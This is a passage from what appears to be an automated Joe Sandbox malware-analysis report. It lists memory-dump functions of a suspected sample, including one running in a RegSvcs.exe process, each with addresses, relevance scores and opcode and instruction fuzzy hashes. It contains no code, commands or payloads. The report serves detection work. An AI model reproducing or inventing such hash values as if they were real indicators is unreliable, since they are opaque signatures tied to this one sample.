Source File: 00000000.00000002.2234060335.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbcc4be03e8dca247794e41671ce30ede0862252154aa517e11934151d517b8f
Instruction ID: 4c1ab8c54f1ce3c4a0ed0c5d7bed90af3ade77c3ff92bb9088f1ccf70461be3f
Opcode Fuzzy Hash: cbcc4be03e8dca247794e41671ce30ede0862252154aa517e11934151d517b8f
Instruction Fuzzy Hash: A9D0120030E3D60BC74357B02824398BF710E4B05072D80C7EC88DA18BEA28484B9352

Function 078E683F Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2234060335.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a52e6cc79f876ebc84fc7fc00a59f16796519ce48e6be619aede9c34663d9f52
Instruction ID: ee32c895b5aa27000ddad6546cddb7a593b8030e4db6405f926e823299dc4410
Opcode Fuzzy Hash: a52e6cc79f876ebc84fc7fc00a59f16796519ce48e6be619aede9c34663d9f52
Instruction Fuzzy Hash: BED012750A4401CFC700CFA8D048B907BF0EF18525F1941D1D84CC7662D7229C118B40

Function 078EB870 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2234060335.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d10bacdc44dcb87908b0d91ecde30891a9007a8679343653b8862686e3109e5
Instruction ID: de30cdb8ef36207409506091183839d9d98348ee338c9d309fbe3b333cd85c0a
Opcode Fuzzy Hash: 0d10bacdc44dcb87908b0d91ecde30891a9007a8679343653b8862686e3109e5
Instruction Fuzzy Hash: 22C0802431021447D70422B5650971B7FD5EB85614F204460F50FC7386ED725801C215

Function 078305E0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2233782451.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d44c56c2093480c59c7b1508d0e564644d8f3fc6c3b4691388346bbef761e1d
Instruction ID: 0888f303676011bc4dd3210e72265e3e6f3eb2317835c6269d96a5814a9b5407
Opcode Fuzzy Hash: 1d44c56c2093480c59c7b1508d0e564644d8f3fc6c3b4691388346bbef761e1d
Instruction Fuzzy Hash: 9DD012725197818FD3469774EC150427BA1AA4B275325C3CBE0B9CE6E3DA150962C714

Function 078EB86E Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2234060335.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fad0289be38048afea2e1d537e34cf77adfcbf43631aaadbc672a7203ea6e2b
Instruction ID: a866a3d601fb2f76019fcf671470841e925c3655f1ac7aea53ccc958f58ddaf3
Opcode Fuzzy Hash: 3fad0289be38048afea2e1d537e34cf77adfcbf43631aaadbc672a7203ea6e2b
Instruction Fuzzy Hash: B5C08C283201108BEB0823B0631D32B3FD3ABC4215F204868B50FC77CAFD329812C200

Function 078EF8A8 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2234060335.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccb7c20fd31add7e50dcfbc0f88fa000fd79861afd08fa3c6eb900297b9f45d1
Instruction ID: ea7df405482c9a9d19a53db527b947961799f536e8237a2e3a0fad1fa65e0c18
Opcode Fuzzy Hash: ccb7c20fd31add7e50dcfbc0f88fa000fd79861afd08fa3c6eb900297b9f45d1
Instruction Fuzzy Hash: CAC08C72002A0897FB082BA0A80E3247B6CA701212F044010D10CA1820DBB85880CB1A

Function 07830C03 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2233782451.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54b7bb9f7843774b79bc6801deabd1d694544ec4592d5b2029f5f5f01d34ec71
Instruction ID: 11ea57f0c1313601c5a05b7b77dd9161d3c14dfdc13c4de6302ed773e4ec8116
Opcode Fuzzy Hash: 54b7bb9f7843774b79bc6801deabd1d694544ec4592d5b2029f5f5f01d34ec71
Instruction Fuzzy Hash: 3FC08C3430E3808FDF239260C2B02C23F30CBCA700B0648D7C0848B9AAC3288E01C3D1

Function 07831160 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2233782451.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f21729eab88c475be01776d812fc0a2e38e44fffab1085755f30df55693a9a5f
Instruction ID: 277e074440b7d53d47a061efd053be54cfd524991ac0f171825ad977fcc75087
Opcode Fuzzy Hash: f21729eab88c475be01776d812fc0a2e38e44fffab1085755f30df55693a9a5f
Instruction Fuzzy Hash: F2C08CF8204100AFD3089B208D48A27BEE3EFE8302F41C418F60087228CE708841DA51

Function 078EC188 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2234060335.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f681273ce0261858f9bb9aabcaadb72970e8632a2ae80a152f276bc306a55c0
Instruction ID: 48369c555eddd07e070c99dc9d987bb069ec00ce6257164d581b1b33bca7b406
Opcode Fuzzy Hash: 6f681273ce0261858f9bb9aabcaadb72970e8632a2ae80a152f276bc306a55c0
Instruction Fuzzy Hash: 30C04CD65AD6C4CDF30253755C229515F20192731831D61A6C294950E3D5485556DB2F

Function 078EB8EC Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2234060335.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d29e75e784c6031c12ad73926f2d82f4ef15c4a9e7ce3420320e8eb32b6b0e2d
Instruction ID: 1160597c84a80816ec604103882d4bc1d393a59680088c70261a1b743617e288
Opcode Fuzzy Hash: d29e75e784c6031c12ad73926f2d82f4ef15c4a9e7ce3420320e8eb32b6b0e2d
Instruction Fuzzy Hash: F3B012FA1A8308E170446A684CD4D3FBC26FBB3700F809C09F759C0050CA6049299937

Function 078E6850 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2234060335.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
Instruction ID: a0ccf6e4bed68dc0c69f5d0bbd707ad7c253f4111acce2a0e91a8f8d8fd4bd45
Opcode Fuzzy Hash: b76679b0a354449729844e828cdbdd8dc5f87ab3334555cc76ca9f307cd6f9ad
Instruction Fuzzy Hash: 03B092351602088F82409B68E448C00B3E8AB08A243118090E10C8B232C621F8008A40

Function 078305F0 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2233782451.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d10ddfaed73196fa40fc38f86b5f22b659a1f82b2c39427ccb05ec7a6f041e93
Instruction ID: f69e5ee8740597035d96452d39749741ab868030dfcccb3309a2ad1ace24e8b9
Opcode Fuzzy Hash: d10ddfaed73196fa40fc38f86b5f22b659a1f82b2c39427ccb05ec7a6f041e93
Instruction Fuzzy Hash: 86B0123202430887830057ACFC06411739D5644734374D358F03D4A2D2CE12B8228654

Function 07830C38 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2233782451.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c17ecbe5a43b17dfba937357067319b03852ae868c902f68e373da6964624555
Instruction ID: ebb2e3463b1c8fda8bf8d7dbd63c896d4f96199726049cd11d8c0c92db8d06c0
Opcode Fuzzy Hash: c17ecbe5a43b17dfba937357067319b03852ae868c902f68e373da6964624555
Instruction Fuzzy Hash: 0BB0123000020E8BD5116B94F5069143F1DEDC461578051A9A10C05011FDAD3C454A94

Function 078E0E50 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2234060335.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 834729028d9f558b0b0b3ebefb71b4ffe3989203e30084aca00dc3b4b30a21c5
Instruction ID: 9689593dda145aab46d830541cc714be87ee99ddae0ac6dc5a5be50b0852ddb8
Opcode Fuzzy Hash: 834729028d9f558b0b0b3ebefb71b4ffe3989203e30084aca00dc3b4b30a21c5
Instruction Fuzzy Hash: 0EC09230512280DFDB06CF30C148C007B72AF4230935940D8E0098B522CB36ECC2CB00

Function 078ED0D0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2234060335.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42862d5eb0ad9d7f8aa0c9e866f265d58e7da3a065d0b1dcae131ef464f297d3
Instruction ID: 94a04e41a7bbb5e9dc4d0e8e27bf10a043b611831bc3085290fb05b1fe6f9b59
Opcode Fuzzy Hash: 42862d5eb0ad9d7f8aa0c9e866f265d58e7da3a065d0b1dcae131ef464f297d3
Instruction Fuzzy Hash: E4A01128220AA0CB8AC0223800082282EE2B2882003E08880A282C2328CC300802C200

Function 078EAB78 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2234060335.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00153141ce35627617132f86ba25ea41f0c913297b92c0aa605454184ed530c9
Instruction ID: c47dd2004f20803847bf4d1f23a48d5e21895d7b4e4b7f75bff406b64d98e8dd
Opcode Fuzzy Hash: 00153141ce35627617132f86ba25ea41f0c913297b92c0aa605454184ed530c9
Instruction Fuzzy Hash: BFA0222C3320008F8380233C28082083CE3E3C8220BE00080AF03C330CEC300C000B00

Non-executed Functions

Function 07873628 Relevance: 1.7, Strings: 1, Instructions: 439COMMON

Download Yara Rule

Strings

%, xrefs: 07873A1C

Memory Dump Source

Source File: 00000000.00000002.2233924311.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7870000_file.jbxd

Similarity

API ID:
String ID: %
API String ID: 0-2567322570
Opcode ID: 34ff37708bd41fb23b3237ba52d6b0a5ef91add0b22c280e1a3cffa1bbe7c412
Instruction ID: 57d0e5db9bd208813970c2ba8cd0fe40f93b14979222b9a4230dd77349d48b62
Opcode Fuzzy Hash: 34ff37708bd41fb23b3237ba52d6b0a5ef91add0b22c280e1a3cffa1bbe7c412
Instruction Fuzzy Hash: 6D0259B0A00205DFDB18DFA9C848AAEBBB2FF99301F14852DD506DB755DB34E846CB51

Function 09316460 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

R1'L, xrefs: 093164BB

Memory Dump Source

Source File: 00000000.00000002.2234376093.0000000009310000.00000040.00000800.00020000.00000000.sdmp, Offset: 09310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9310000_file.jbxd

Similarity

API ID:
String ID: R1'L
API String ID: 0-3225823308
Opcode ID: 4fbb9b04632b209a4f3b394f4637906d57b53946bfad088954f61ef18cf2e2cb
Instruction ID: d81decc0041163c18c99560be58b83cc0b37eee29f52c4c4f4fb1e4831447310
Opcode Fuzzy Hash: 4fbb9b04632b209a4f3b394f4637906d57b53946bfad088954f61ef18cf2e2cb
Instruction Fuzzy Hash: AAE10C74E002598FDB14CFA9C591AAEFBB2FF89304F248269D514AB355D731AD42CF60

Function 0931644F Relevance: 1.4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

Strings

R1'L, xrefs: 093164BB

Memory Dump Source

Source File: 00000000.00000002.2234376093.0000000009310000.00000040.00000800.00020000.00000000.sdmp, Offset: 09310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9310000_file.jbxd

Similarity

API ID:
String ID: R1'L
API String ID: 0-3225823308
Opcode ID: a59d41ea38df91b600a537ab2d2a9fb39e87173bd787b9582576d8389b6f650d
Instruction ID: 9d3af262ac7908dc04bbec44a095c62493919c146c8edd3ec8fa8521e6ae7f96
Opcode Fuzzy Hash: a59d41ea38df91b600a537ab2d2a9fb39e87173bd787b9582576d8389b6f650d
Instruction Fuzzy Hash: B651F874E102598FDB18CFA9C5855AEFBF2FF89304F248269D418A7326D7319942CFA1

Function 07875F10 Relevance: 1.3, Instructions: 1271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2233924311.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7870000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d8685a9153cb2b9e819239bd2a580b32a3ed49e7390f6fc863c61959a3c708e
Instruction ID: 33eaaa8c1d62c5bbcc8c26eb54f821d16165bfb8191b473d65ddf89272b68764
Opcode Fuzzy Hash: 6d8685a9153cb2b9e819239bd2a580b32a3ed49e7390f6fc863c61959a3c708e
Instruction Fuzzy Hash: 90C207B0A00219CFCB25DF64C984AADBBB2FF99305F1485A9E90AE7250DB75DD81CF50

Function 0787AFB8 Relevance: 1.1, Instructions: 1121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2233924311.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7870000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c9810c7372f84f72d8d7d4ddfeec67008891ded4df7d14b28d75c0dffbfa122
Instruction ID: 172779378694cbfaa3daec01bb341b234429086f74e5564ab9059f8fe5f7bbce
Opcode Fuzzy Hash: 3c9810c7372f84f72d8d7d4ddfeec67008891ded4df7d14b28d75c0dffbfa122
Instruction Fuzzy Hash: 43A27AB1A00245DFDB25CF68C484A6ABFF2FF94310F1585A9E546DB652DB30EC86CB90

Function 07838DA8 Relevance: .8, Instructions: 782COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2233782451.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b986a138cc60b28d98afd71c46e63ee0ce196122867f9ebc2e767c7d0d24fb81
Instruction ID: 4a03e009aefa791f38f6cc944b8be2fff5e83582f48de021725a0f968925dade
Opcode Fuzzy Hash: b986a138cc60b28d98afd71c46e63ee0ce196122867f9ebc2e767c7d0d24fb81
Instruction Fuzzy Hash: 976231F06002019BE748DF69C45871A7AE6EB94308F64C55CC209DF792DFBAD90BCBA5

Function 07838DB8 Relevance: .8, Instructions: 780COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2233782451.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65c770e22331a7f89a16c03e7adb6a0ee0579cd116eed4b3f16dbfde8134b9e0
Instruction ID: 6eaf245d8c8fbf5bff9f45f9618ea67ee655c95f4e1640050ea430c05798027c
Opcode Fuzzy Hash: 65c770e22331a7f89a16c03e7adb6a0ee0579cd116eed4b3f16dbfde8134b9e0
Instruction Fuzzy Hash: 666221F06002019BE748DF69C45871A7AE6EB94308F64C55CC209DF792DFBAD90BCBA5

Function 078747CF Relevance: .6, Instructions: 636COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2233924311.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7870000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17013b6c9f258221c97c53f8b370c07e991fe50990e3f2e24450e8ab3bb84abb
Instruction ID: 54dd8ae8418eb474d9cb3ec9fbc0bc4a51805e50daff037d3fae9f8b37c5bd32
Opcode Fuzzy Hash: 17013b6c9f258221c97c53f8b370c07e991fe50990e3f2e24450e8ab3bb84abb
Instruction Fuzzy Hash: C1427AB0A00381CFCB249F75D588A6ABBF6FF95315F148569E54BCB690DB39E881CB10

Function 0787CAE0 Relevance: .6, Instructions: 636COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2233924311.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7870000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d53f835f8bcaf75d03d400b12335dd1d6c7a5832490c0e47818c4571b6ae5939
Instruction ID: c19384d40d78536576ff74f4d677551e4d168ec633466697a7792de04a03a99b
Opcode Fuzzy Hash: d53f835f8bcaf75d03d400b12335dd1d6c7a5832490c0e47818c4571b6ae5939
Instruction Fuzzy Hash: 9D427BB0B00245DFDB14DF68C884A6ABBF2BF99301F148569E916DB391DB74EC46CB60

Function 07838620 Relevance: .5, Instructions: 489COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2233782451.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0df8e8e532f26009f7faa4c23c42ef0175090f86a0ce8a6444a3aa8b66b4ff7
Instruction ID: 13b216fa9b9a127bb16169781750ef15fd7966f71d1cdd08cee3b8a77382eb39
Opcode Fuzzy Hash: e0df8e8e532f26009f7faa4c23c42ef0175090f86a0ce8a6444a3aa8b66b4ff7
Instruction Fuzzy Hash: BC128CB1A0020ADFDB15DF68D880A9EBBF2FF94310F148569E505EB251DB30EC46CBA1

Function 07879628 Relevance: .4, Instructions: 402COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2233924311.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7870000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7133ed88f1e589e1c6636468993fcce8a3c17f1324a5baacab994a5d4188cf32
Instruction ID: c3e9e1de85d1f68dc910f279dfc21f0f2ecf2c9492bc14ea5c5c63c9f2c1dd72
Opcode Fuzzy Hash: 7133ed88f1e589e1c6636468993fcce8a3c17f1324a5baacab994a5d4188cf32
Instruction Fuzzy Hash: FCF15AB5A00706CFDB25CF69C484A6ABBF2BF98300F148569D89ADB761D738F845CB40

Function 07877340 Relevance: .4, Instructions: 401COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2233924311.0000000007870000.00000040.00000800.00020000.00000000.sdmp, Offset: 07870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7870000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e86a92364e0ff1aa6b1249f8592e0638e527b56f0fea9b7ff82f523fbf2ece41
Instruction ID: 4f3cba6afe74f4a94206b16bbb43e5618682fe0460ef84b322b0de0477667b88
Opcode Fuzzy Hash: e86a92364e0ff1aa6b1249f8592e0638e527b56f0fea9b7ff82f523fbf2ece41
Instruction Fuzzy Hash: 66F13CB4A00209DFDB08DFA8C854AADBBB2FF98300F148569E516EB355DB35EC46CB51

Function 0931D5B0 Relevance: .4, Instructions: 362COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2234376093.0000000009310000.00000040.00000800.00020000.00000000.sdmp, Offset: 09310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9310000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4662215c4d5ff08c1f5d74009aeeb8675b9912f6c4effeb5cc32ba814a1dfe15
Instruction ID: a56f260f0967f58314619fc7f1c0a056a3f742e4e0af9450275e89f18571c76d
Opcode Fuzzy Hash: 4662215c4d5ff08c1f5d74009aeeb8675b9912f6c4effeb5cc32ba814a1dfe15
Instruction Fuzzy Hash: 82D18771B016018FEB29EF75C550BAAB7F6AFCA700F14846ED15ADB2A0DB35E801CB51

Function 09314980 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2234376093.0000000009310000.00000040.00000800.00020000.00000000.sdmp, Offset: 09310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9310000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c9d6c817f9f92f30be84e292ffe953d01c3d428f6e36cea682597a2e5c16699
Instruction ID: 2723ff98e468977885026e7eacf4e71d639dce7cfeab5cd3e1a32d1890e7f127
Opcode Fuzzy Hash: 3c9d6c817f9f92f30be84e292ffe953d01c3d428f6e36cea682597a2e5c16699
Instruction Fuzzy Hash: E4E1F874E002598FDB14CF99C584AAEFBB2FF89304F248269D514AB365D731AD82CF61

Function 09317248 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2234376093.0000000009310000.00000040.00000800.00020000.00000000.sdmp, Offset: 09310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9310000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d8a71a19e39ebe5cda4120ba04c96d5989131f7bbf826c2525f274e1a4b8c13
Instruction ID: 4eef4d3f5c91cdf6bb9515dff8c31539f35a2fb77eaac58b404befd3377195e8
Opcode Fuzzy Hash: 0d8a71a19e39ebe5cda4120ba04c96d5989131f7bbf826c2525f274e1a4b8c13
Instruction Fuzzy Hash: CEE10A74E002598FDB14CFA9C581AAEFBB2FF89304F248269D515AB355D731AD42CFA0

Function 09316D38 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2234376093.0000000009310000.00000040.00000800.00020000.00000000.sdmp, Offset: 09310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9310000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec7bc35c6d45ba038f11e9e4f0100e0d9b68710d83cb2dc90f6a3ea5b340bbcc
Instruction ID: b5cf974b236d3e56fc40623ce7cad55fa97fe2b7c9fd48c5dace678feaa7db46
Opcode Fuzzy Hash: ec7bc35c6d45ba038f11e9e4f0100e0d9b68710d83cb2dc90f6a3ea5b340bbcc
Instruction Fuzzy Hash: 4EE11C74E002598FDB14CFA9C581AAEFBB2FF49304F248269D515A7365D731AD42CF60

Function 09314DB8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2234376093.0000000009310000.00000040.00000800.00020000.00000000.sdmp, Offset: 09310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9310000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7586ec166b61e72087ea09cbeb529851b7d1b48e1a5a210362a1eeef091f09f4
Instruction ID: c5ad8306c8a25a033f531dbdab5a9a1a9f9dd53e9cac112f78e6bfeb6da335f6
Opcode Fuzzy Hash: 7586ec166b61e72087ea09cbeb529851b7d1b48e1a5a210362a1eeef091f09f4
Instruction Fuzzy Hash: E7E1FC74E002598FDB14CFA9C580AAEFBB2FF89304F248269E514A7365D771AD42CF60

Function 0194E214 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2229656985.0000000001940000.00000040.00000800.00020000.00000000.sdmp, Offset: 01940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1940000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18e2bf92b521ca616c1712837da0178de3fe1d53b3d87bcfc1f3ae84205a2bdb
Instruction ID: e7ce0b67bfb80e26be8b55692192be80d028ee17474be4c6479559973c088ba4
Opcode Fuzzy Hash: 18e2bf92b521ca616c1712837da0178de3fe1d53b3d87bcfc1f3ae84205a2bdb
Instruction Fuzzy Hash: 7FA19432E0021ACFDF05DFB9C88099EBBB6FFC4301B15456AE909AB255EB75D915CB40

Function 09314DA9 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2234376093.0000000009310000.00000040.00000800.00020000.00000000.sdmp, Offset: 09310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9310000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bf9ded3355c788a427e20a553d2bbcb5085a76649407e2d56b76fc9f406adaa
Instruction ID: 4fee6d26f307f1074dde340bd6b2c23f81f62f8e6fe61c6e4d34e48c6ab8429a
Opcode Fuzzy Hash: 4bf9ded3355c788a427e20a553d2bbcb5085a76649407e2d56b76fc9f406adaa
Instruction Fuzzy Hash: BE510A74E002198BDB18CFA9C5855AEFBF2FF89304F248269D418AB365D7319942CFA1

Analysis Process: RegSvcs.exePID: 3328, Parent PID: 3852COMMON

Executed Functions

Function 00E29858 Relevance: .8, Instructions: 847COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2319746667.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c61d0f4d17ef5b0c0a4df1d138fc95ba7fc4c9c8bddca41ce360b5f1f458593
Instruction ID: a3d43adc76bce660d11cf1ab459d5a32102d6d1fb21f8483122803728da080f5
Opcode Fuzzy Hash: 7c61d0f4d17ef5b0c0a4df1d138fc95ba7fc4c9c8bddca41ce360b5f1f458593
Instruction Fuzzy Hash: 3F729F71A00219CFCB15CF64D984AAEBBF2FF88310F159569E805AB3A5D730EC51CB51

Function 00E26730 Relevance: .4, Instructions: 438COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2319746667.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbd9c54f77ce7aeb9e83b307d80f8ddf7f2ef3d76bf80d6485d471ccca29f7c2
Instruction ID: 7d56093bd32bf6321ae564f5da6ac9e6cccad42603f8fb60a360a33bc859d97c
Opcode Fuzzy Hash: cbd9c54f77ce7aeb9e83b307d80f8ddf7f2ef3d76bf80d6485d471ccca29f7c2
Instruction Fuzzy Hash: C0023C71A00229DFCB15DFA8E984AADBBB6FF88304F159269E445FB261DB30DD41CB50

Function 00E2B328 Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2319746667.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
